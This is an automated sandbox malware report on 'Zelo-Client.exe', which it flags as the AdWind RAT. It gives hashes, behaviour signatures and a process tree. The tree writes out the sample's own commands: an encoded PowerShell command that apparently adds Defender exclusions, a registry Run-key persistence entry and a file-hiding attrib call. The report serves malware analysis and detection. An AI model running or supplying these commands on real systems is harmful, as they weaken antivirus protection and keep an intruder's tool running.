Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/10/2024, 23:15

General

  • Target

    Zelo-Client.exe

  • Size

    647KB

  • MD5

    6a8c1f741fa6b769273261f408a4dc31

  • SHA1

    fb9c298f981965d2af6b0616a87f3c2c03596311

  • SHA256

    32bcbaad1e453a6a32bcbb90178b7b75168c43287e51954962ed2e2c565133a1

  • SHA512

    306c7447e4e8cc7b6fa5830bfb1ef1a58dfd523fb89dc739e68bd453c6f8163631d35b5accd1717dcd18d7bc1187d69f5b67bf357325ba48c44c11db26f9bfb5

  • SSDEEP

    12288:Rwhg3NJmAtot9EJy80QYw2U1u6/RdQ7Zzf9STRu0FdShOcymSesf:Ohg5obEc80QR2UbJM9STFfLcymS

Malware Config

Signatures

  • AdWind

    A Java-based RAT family operated as malware-as-a-service.

  • Class file contains resources related to AdWind 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Zelo-Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Zelo-Client.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAeAB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAaABtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAeABoACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3616
    • C:\Program Files\Java\jre-1.8\bin\javaw.exe
      "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Windows\Zelo-Client.jar"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +H C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1729466117662.tmp
        3⤵
        • Views/modifies file attributes
        PID:2844
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1729466117662.tmp" /f"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2304
        • C:\Windows\system32\reg.exe
          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1729466117662.tmp" /f
          4⤵
          • Adds Run key to start application
          PID:4120

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajxdqz24.uos.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\Zelo-Client.jar

    Filesize

    639KB

    MD5

    8bac893810be1acf6b083f16363a73cf

    SHA1

    d291c9dc85d7df6f1222d8bcaf5bb10e2578fa56

    SHA256

    739d2d19e79d073f9e1d1489c145879cff44c2c91e5d691d53ccc8599ac8a467

    SHA512

    e9dcb3dcd6924b61c67af33e88d59bc9d6b2e626234eb09aa18463e09622670d1d220024e9a504b44de23ca88bb426f295968e8d7dd644f49128c8ca7ed4d629

  • memory/1076-31-0x000001D71BB20000-0x000001D71BD90000-memory.dmp

    Filesize

    2.4MB

  • memory/1076-57-0x000001D71BB20000-0x000001D71BD90000-memory.dmp

    Filesize

    2.4MB

  • memory/1076-55-0x000001D71A1A0000-0x000001D71A1A1000-memory.dmp

    Filesize

    4KB

  • memory/1076-39-0x000001D71A1A0000-0x000001D71A1A1000-memory.dmp

    Filesize

    4KB

  • memory/1076-38-0x000001D71A1A0000-0x000001D71A1A1000-memory.dmp

    Filesize

    4KB

  • memory/3616-23-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3616-30-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3616-20-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3616-34-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3616-19-0x00000240DD9E0000-0x00000240DDA02000-memory.dmp

    Filesize

    136KB

  • memory/4644-0-0x00007FFC27F23000-0x00007FFC27F25000-memory.dmp

    Filesize

    8KB

  • memory/4644-7-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4644-2-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4644-1-0x0000000000910000-0x00000000009B8000-memory.dmp

    Filesize

    672KB